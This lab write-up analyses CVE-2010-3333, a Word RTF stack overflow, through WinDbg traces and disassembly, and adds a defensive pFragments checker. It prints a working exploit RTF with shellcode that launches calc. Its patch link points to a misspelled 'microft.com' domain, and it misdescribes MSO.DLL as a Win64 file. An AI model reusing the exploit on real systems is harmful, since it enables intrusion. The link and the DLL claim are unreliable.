CVE-2010-3333 Microsoft RTF Stack Overflow Vulnerability Analysis
Lab environment
OS: VMware Windows XP SP3
Office version: Microsoft Office Word 2003
Vulnerable file: MSO.DLL 11.0.5606.0
Debugger: WinDbg 6.12.0002.633 x86
Vulnerability description
Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010 and other versions contain a stack overflow in the handling of the drawing pFragments property of an RTF document. An attacker can craft a malicious RTF file; when Word opens it, Word copies the data from the RTF directly into a local stack buffer without validating the size of the data being copied, which leads to a classic stack overflow.
Sample
I. Vulnerability information
1. Vulnerability summary
(required)
- Vulnerability name: Microsoft RTF stack overflow vulnerability
- Vulnerability ID: CVE-2010-3333
- Vulnerability type: stack overflow
- Impact: Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010 and other versions contain a stack overflow in the handling of the drawing pFragments property of an RTF document.
- CVSS score:
- Exploit difficulty: simple
- Required privileges: none
II. Reproducing the vulnerability
1. Environment setup
- OS: VMware Windows XP SP3
- Office version: Microsoft Office Word 2003
- Vulnerable file: MSO.DLL 11.0.5606.0
- Debugger: WinDbg 6.12.0002.633 x86
2. Reproduction steps
1. Use Metasploit to generate a PoC sample that triggers the vulnerability.
2. With the sample in hand, start WinDbg on Windows XP and attach it to the running winword.exe.
3. Press g in WinDbg to let Word continue, then open the sample file msf.rtf in Word. Word reports an error and stops responding.
(7f8.684): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000c8ac ebx=05000000 ecx=0000019b edx=00000000 esi=1104c24c edi=00130000
eip=30e9eb88 esp=00123d98 ebp=00123dd0 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Common Files\Microsoft Shared\office11\mso.dll -
mso!Ordinal6426+0x64d:
30e9eb88 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
The access violation, error code c0000005 (first chance), is the stack overflow.
The faulting module is mso.dll. MSO.DLL is regarded as a Microsoft Office 2010 component file; it is most commonly used by Microsoft Office 2010, developed by Microsoft. It carries the DLL file extension and is regarded as a Win64 DLL (dynamic link library) file.
30e9eb88 f3a5 rep movs dword ptr es:[edi],dword ptr [esi] copies data in a loop from the memory region pointed to by esi into the stack region, four bytes per iteration.
This is where the problem lies: data is copied from the memory region given by esi onto the stack without any check against the size of the stack buffer, so the memory pointed to by edi is overwritten until an access violation results. The faulting instruction address is 30e9eb88.
4. Locate the faulting function
Reopen WinDbg, attach to the winword.exe process, and set a breakpoint:
bp 30e9eb88
(For various reasons the faulting instruction address is not necessarily the same on every run.)
Then repeat the steps above until WinDbg stops at rep movs dword ptr es:[edi],dword ptr [esi].
5. Examine the call stack
Enter kb.
Seven functions appear; we analyze them one by one.
First, keep in mind that the program is laid out in memory from low addresses to high addresses, execution within a function also proceeds from low to high, and the ret instruction then returns to the previous function.
If the last frame is the faulting function, the second-to-last frame is very likely the one that called it, so we debug the function mso!Ordinal753+0x306e.
0:000> kb
ChildEBP RetAddr  Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00123dd0 30f4cdbd 00123f3c 00000000 ffffffff mso!Ordinal6426+0x64d
00123e00 30f4a597 00123f88 00123f3c 00000000 mso!Ordinal753+0x306e
0012404c 30d4b199 00000000 0012408c 00000000 mso!Ordinal753+0x848
00124074 30d4b148 30d4ae32 014d14c8 014d1500 mso!Ordinal4196+0x61f
00124078 30d4ae32 014d14c8 014d1500 014d13b0 mso!Ordinal4196+0x5ce
0012407c 014d14c8 014d1500 014d13b0 30dc9d44 mso!Ordinal4196+0x2b8
00124080 014d1500 014d13b0 30dc9d44 00000000 0x14d14c8
00124084 014d13b0 30dc9d44 00000000 014d1118 0x14d1500
00124088 30dc9d44 00000000 014d1118 00124e38 0x14d13b0
0012408c 00000000 014d1118 00124e38 00000000 mso!Ordinal2940+0x158fc
0:000> uf mso!Ordinal753+0x306e
mso!Ordinal753+0x306e:
30f4cdbd 84c0            test    al,al
30f4cdbf 744c            je      mso!Ordinal753+0x30be (30f4ce0d)

mso!Ordinal753+0x3072:
30f4cdc1 3bfb            cmp     edi,ebx
30f4cdc3 c6451300        mov     byte ptr [ebp+13h],0
30f4cdc7 0f8d260a0000    jge     mso!Ordinal753+0x3aa4 (30f4d7f3)

mso!Ordinal753+0x307e:
30f4cdcd 8365f800        and     dword ptr [ebp-8],0
30f4cdd1 ff7514          push    dword ptr [ebp+14h]
30f4cdd4 8bc6            mov     eax,esi
30f4cdd6 f7d8            neg     eax
30f4cdd8 1bc0            sbb     eax,eax
30f4cdda 8d4df8          lea     ecx,[ebp-8]
30f4cddd 23c1            and     eax,ecx
30f4cddf 50              push    eax
30f4cde0 8b4508          mov     eax,dword ptr [ebp+8]
30f4cde3 4b              dec     ebx
30f4cde4 53              push    ebx
30f4cde5 47              inc     edi
30f4cde6 57              push    edi
30f4cde7 ff750c          push    dword ptr [ebp+0Ch]
30f4cdea e86efeffff      call    mso!Ordinal753+0x2f0e (30f4cc5d)
30f4cdef 84c0            test    al,al
30f4cdf1 740c            je      mso!Ordinal753+0x30b0 (30f4cdff)

mso!Ordinal753+0x30a4:
30f4cdf3 85f6            test    esi,esi
30f4cdf5 0f8559280000    jne     mso!Ordinal2257+0x128 (30f4f654)

mso!Ordinal753+0x30ac:
30f4cdfb c6451301        mov     byte ptr [ebp+13h],1

mso!Ordinal753+0x30b0:
30f4cdff 8b45fc          mov     eax,dword ptr [ebp-4]
30f4ce02 85c0            test    eax,eax
30f4ce04 0f853f281300    jne     mso!Ordinal1549+0x93fcc (3107f649)

mso!Ordinal753+0x30bb:
30f4ce0a 8a4513          mov     al,byte ptr [ebp+13h]

mso!Ordinal753+0x30be:
30f4ce0d 5e              pop     esi
30f4ce0e 5b              pop     ebx
30f4ce0f 5f              pop     edi
30f4ce10 c9              leave
30f4ce11 c21000          ret     10h

mso!Ordinal753+0x3aa4:
30f4d7f3 85f6            test    esi,esi
30f4d7f5 0f8400f6ffff    je      mso!Ordinal753+0x30ac (30f4cdfb)

mso!Ordinal753+0x3aac:
30f4d7fb 8b45fc          mov     eax,dword ptr [ebp-4]
30f4d7fe 8906            mov     dword ptr [esi],eax

mso!Ordinal753+0x3ab1:
30f4d800 8365fc00        and     dword ptr [ebp-4],0
30f4d804 e9f2f5ffff      jmp     mso!Ordinal753+0x30ac (30f4cdfb)

mso!Ordinal2257+0x128:
30f4f654 ff75f8          push    dword ptr [ebp-8]
30f4f657 8b55fc          mov     edx,dword ptr [ebp-4]
30f4f65a 8bce            mov     ecx,esi
30f4f65c e889ffffff      call    mso!Ordinal2257+0xbe (30f4f5ea)
30f4f661 84c0            test    al,al
30f4f663 0f8496d7ffff    je      mso!Ordinal753+0x30b0 (30f4cdff)

mso!Ordinal2257+0x13d:
30f4f669 e992e1ffff      jmp     mso!Ordinal753+0x3ab1 (30f4d800)

mso!Ordinal1549+0x93fcc:
3107f649 8b08            mov     ecx,dword ptr [eax]
3107f64b 50              push    eax
3107f64c ff5104          call    dword ptr [ecx+4]
3107f64f e9b6d7ecff      jmp     mso!Ordinal753+0x30bb (30f4ce0a)
After inspecting this function, we see that the call to address 30f4cc5d is what leads into the faulting function, so we single-step through mso!Ordinal753+0x2f0e.
Set another breakpoint: bp 30f4cc5d
Then single-step through it:
0:000> p
eax=00123f88 ebx=00000000 ecx=00123dfc edx=00000000 esi=00000000 edi=00000000
eip=30f4cc5e esp=00123dd0 ebp=00123e00 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mso!Ordinal753+0x2f0f:
30f4cc5e 8bec            mov     ebp,esp
0:000> p
eax=00123f88 ebx=00000000 ecx=00123dfc edx=00000000 esi=00000000 edi=00000000
eip=30f4cc60 esp=00123dd0 ebp=00123dd0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mso!Ordinal753+0x2f11:
30f4cc60 83ec14          sub     esp,14h
0:000> p
eax=00123f88 ebx=00000000 ecx=00123dfc edx=00000000 esi=00000000 edi=00000000
eip=30f4cc63 esp=00123dbc ebp=00123dd0 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000212
mso!Ordinal753+0x2f14:
30f4cc63 837d1800        cmp     dword ptr [ebp+18h],0 ss:0023:00123de8=014d14e0
0:000> p
eax=00123f88 ebx=00000000 ecx=00123dfc edx=00000000 esi=00000000 edi=00000000
eip=30f4cc67 esp=00123dbc ebp=00123dd0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mso!Ordinal753+0x2f18:
30f4cc67 57              push    edi
0:000> p
eax=00123f88 ebx=00000000 ecx=00123dfc edx=00000000 esi=00000000 edi=00000000
eip=30f4cc68 esp=00123db8 ebp=00123dd0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mso!Ordinal753+0x2f19:
30f4cc68 8bf8            mov     edi,eax
0:000> p
eax=00123f88 ebx=00000000 ecx=00123dfc edx=00000000 esi=00000000 edi=00123f88
eip=30f4cc6a esp=00123db8 ebp=00123dd0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mso!Ordinal753+0x2f1b:
30f4cc6a 0f84b6291300    je      mso!Ordinal1549+0x93fa9 (3107f626)      [br=0]
0:000> p
eax=00123f88 ebx=00000000 ecx=00123dfc edx=00000000 esi=00000000 edi=00123f88
eip=30f4cc70 esp=00123db8 ebp=00123dd0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mso!Ordinal753+0x2f21:
30f4cc70 8b4f08          mov     ecx,dword ptr [edi+8] ds:0023:00123f90=0012408c
0:000> p
eax=00123f88 ebx=00000000 ecx=0012408c edx=00000000 esi=00000000 edi=00123f88
eip=30f4cc73 esp=00123db8 ebp=00123dd0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mso!Ordinal753+0x2f24:
30f4cc73 53              push    ebx
0:000> p
eax=00123f88 ebx=00000000 ecx=0012408c edx=00000000 esi=00000000 edi=00123f88
eip=30f4cc74 esp=00123db4 ebp=00123dd0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mso!Ordinal753+0x2f25:
30f4cc74 56              push    esi
0:000> p
eax=00123f88 ebx=00000000 ecx=0012408c edx=00000000 esi=00000000 edi=00123f88
eip=30f4cc75 esp=00123db0 ebp=00123dd0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mso!Ordinal753+0x2f26:
30f4cc75 e892b4ddff      call    mso!Ordinal6594+0x596 (30d2810c)
0:000> p
eax=00124150 ebx=00000000 ecx=0012408c edx=00000000 esi=00000000 edi=00123f88
eip=30f4cc7a esp=00123db0 ebp=00123dd0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mso!Ordinal753+0x2f2b:
30f4cc7a ff750c          push    dword ptr [ebp+0Ch]  ss:0023:00123ddc=00000000
0:000> p
eax=00124150 ebx=00000000 ecx=0012408c edx=00000000 esi=00000000 edi=00123f88
eip=30f4cc7d esp=00123dac ebp=00123dd0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mso!Ordinal753+0x2f2e:
30f4cc7d 8b7064          mov     esi,dword ptr [eax+64h] ds:0023:001241b4=014d10f0
0:000> p
eax=00124150 ebx=00000000 ecx=0012408c edx=00000000 esi=014d10f0 edi=00123f88
eip=30f4cc80 esp=00123dac ebp=00123dd0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mso!Ordinal753+0x2f31:
30f4cc80 8365f800        and     dword ptr [ebp-8],0  ss:0023:00123dc8=0000004c
0:000> p
eax=00124150 ebx=00000000 ecx=0012408c edx=00000000 esi=014d10f0 edi=00123f88
eip=30f4cc84 esp=00123dac ebp=00123dd0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mso!Ordinal753+0x2f35:
30f4cc84 8b06            mov     eax,dword ptr [esi]  ds:0023:014d10f0=30d9ed10
0:000> p
eax=30d9ed10 ebx=00000000 ecx=0012408c edx=00000000 esi=014d10f0 edi=00123f88
eip=30f4cc86 esp=00123dac ebp=00123dd0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mso!Ordinal753+0x2f37:
30f4cc86 8d4df0          lea     ecx,[ebp-10h]
0:000> p
eax=30d9ed10 ebx=00000000 ecx=00123dc0 edx=00000000 esi=014d10f0 edi=00123f88
eip=30f4cc89 esp=00123dac ebp=00123dd0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mso!Ordinal753+0x2f3a:
30f4cc89 51              push    ecx
0:000> p
eax=30d9ed10 ebx=00000000 ecx=00123dc0 edx=00000000 esi=014d10f0 edi=00123f88
eip=30f4cc8a esp=00123da8 ebp=00123dd0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mso!Ordinal753+0x2f3b:
30f4cc8a bb00000005      mov     ebx,5000000h
0:000> p
eax=30d9ed10 ebx=05000000 ecx=00123dc0 edx=00000000 esi=014d10f0 edi=00123f88
eip=30f4cc8f esp=00123da8 ebp=00123dd0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mso!Ordinal753+0x2f40:
30f4cc8f 56              push    esi
0:000> p
eax=30d9ed10 ebx=05000000 ecx=00123dc0 edx=00000000 esi=014d10f0 edi=00123f88
eip=30f4cc90 esp=00123da4 ebp=00123dd0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mso!Ordinal753+0x2f41:
30f4cc90 895df4          mov     dword ptr [ebp-0Ch],ebx ss:0023:00123dc4=004b0045
0:000> p
eax=30d9ed10 ebx=05000000 ecx=00123dc0 edx=00000000 esi=014d10f0 edi=00123f88
eip=30f4cc93 esp=00123da4 ebp=00123dd0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mso!Ordinal753+0x2f44:
30f4cc93 ff501c          call    dword ptr [eax+1Ch]  ds:0023:30d9ed2c=30e9eb62
0:000> p
(840.84c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000c8ac ebx=05000000 ecx=0000019b edx=00000000 esi=1104c24c edi=00130000
eip=30e9eb88 esp=00123d98 ebp=00123dd0 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
mso!Ordinal6426+0x64d:
30e9eb88 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
This brings us to the instruction that triggers the fault.
30f4cc60 83ec14 sub esp,14h: here the function reserves 0x14 bytes of stack space.
30f4cc7a ff750c push dword ptr [ebp+0Ch] ss:0023:00123ddc=00000000: here the faulty function starts executing. The value in the ecx register is 0x0000c8ac, and since the copy operates on dwords, that value is divided by 4.
Opening msf.rtf in a hex editor, we find that the field ac c8 is what actually ends up in the ecx register, and the data at esi is the data that follows ac c8.
Opening the data file as text, ac c8 is the size of the memory to copy; after it, 40 characters can be padded in to overwrite the stack, the return address is then overwritten with a jmp esp instruction, and finally the shellcode is appended.
4. Exploitation approach
1. Exploitation conditions
Build the RTF data structure in a text file, add the return-address overwrite, and write the shellcode:
{\rtf1{}{\shp{\*\shpinst{\sp{\sv 1;1;4142434445464748495051525354555657585960616263646566ae61d2300000000000000000000000000000000000000000909090909090909090909090909090909090909033C050B82E646C6C50B8656C333250B86B65726E508BC450B87B1D807CFFD033C050B82E65786550B863616C63508BC46A050B8AD23867CFFD033C050B8FACA817CFFD0}{\sn pfragments}}}}}
This is a shellcode that launches the calculator.
2. Exploitation process
Rename the txt file to an rtf file and open it directly with Word; the calculator pops up.
III. Mitigation
http://www.microft.com/zh-cn/download/details.aspx?id=8121
The official patch checks whether the size of the pFragments property value in the RTF file is larger than 4 bytes; if it is, the value is skipped and the function returns without copying.
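As an added illustration of the data layout described above (the \sv value 1;1;<hex>, whose first word ac c8 becomes the copy length 0xc8ac) and of the size check the patch introduces, here is a small Python checker; it is not code from this post or from Microsoft's fix. It extracts every pFragments shape property from an RTF document, decodes the hex data, reads the first word as the little-endian copy length, and flags any value whose declared length exceeds an assumed 4-byte limit modelled on the patch description; the two sample documents are constructed and carry filler bytes, not a payload.

```python
import re
from typing import Dict, List

# Constructed sample documents (not the page's sample; the hex data is filler bytes).
BENIGN_RTF = r"{\rtf1{\shp{\*\shpinst{\sp{\sn pFragments}{\sv 1;1;01000000}}}}}"
SUSPECT_RTF = r"{\rtf1{}{\shp{\*\shpinst{\sp{\sv 1;1;acc84142434445464748}{\sn pfragments}}}}}"

# Assumed limit, modelled on the page's description of the fix (values over 4 bytes rejected).
MAX_FRAGMENT_BYTES = 4

# One shape-property group: {\sp{\sv ...}{\sn ...}} in either order, with no deeper nesting.
SP_GROUP_RE = re.compile(r"\{\\sp((?:\{[^{}]*\})+)\}")
SN_RE = re.compile(r"\\sn\s+([A-Za-z0-9_]+)")
SV_RE = re.compile(r"\\sv\s+([^}]*)")


def inspect_pfragments(rtf: str) -> List[Dict]:
    """Return one finding per pFragments property in the RTF text."""
    findings = []
    for group in SP_GROUP_RE.finditer(rtf):
        body = group.group(1)
        sn, sv = SN_RE.search(body), SV_RE.search(body)
        if not sn or not sv or sn.group(1).lower() != "pfragments":
            continue
        value = sv.group(1).strip()
        fields = value.split(";")
        finding = {"value": value, "declared_size": None,
                   "malformed": False, "suspicious": False}
        try:
            # Value format on the page: 1;1;<hex bytes>; the copy length is the first
            # word of the decoded bytes, little-endian (ac c8 -> 0xc8ac).
            data = bytes.fromhex(fields[2]) if len(fields) == 3 else b""
        except ValueError:
            data = b""
        if len(data) < 2:
            finding["malformed"] = True
        else:
            finding["declared_size"] = int.from_bytes(data[:2], "little")
            finding["suspicious"] = finding["declared_size"] > MAX_FRAGMENT_BYTES
        findings.append(finding)
    return findings


def is_suspicious(rtf: str) -> bool:
    """True when any pFragments value is malformed or declares an oversized copy."""
    return any(f["malformed"] or f["suspicious"] for f in inspect_pfragments(rtf))


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_RTF), ("suspect", SUSPECT_RTF)):
        print(label, inspect_pfragments(doc))
```

The regex only handles the flat {\sp{\sv}{\sn}} layout shown on this page; a production scanner should walk the RTF group tree instead.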
IV. References
cve-2010-3333 analysis notes (cve-2010-3333 分析简笔) - m4sterx - cnblogs (cnblogs.com)
Vulnerability Wars (漏洞战争)
V. Reflection
Start from the sample: analyze it in WinDbg and find the faulting instruction, then single-step to locate the function that contains it, analyze that function, and find the cause of the fault. Analyze the data in the sample file to find its structure, the position of the return address, and where the shellcode can be placed. Finally, exploit the vulnerability.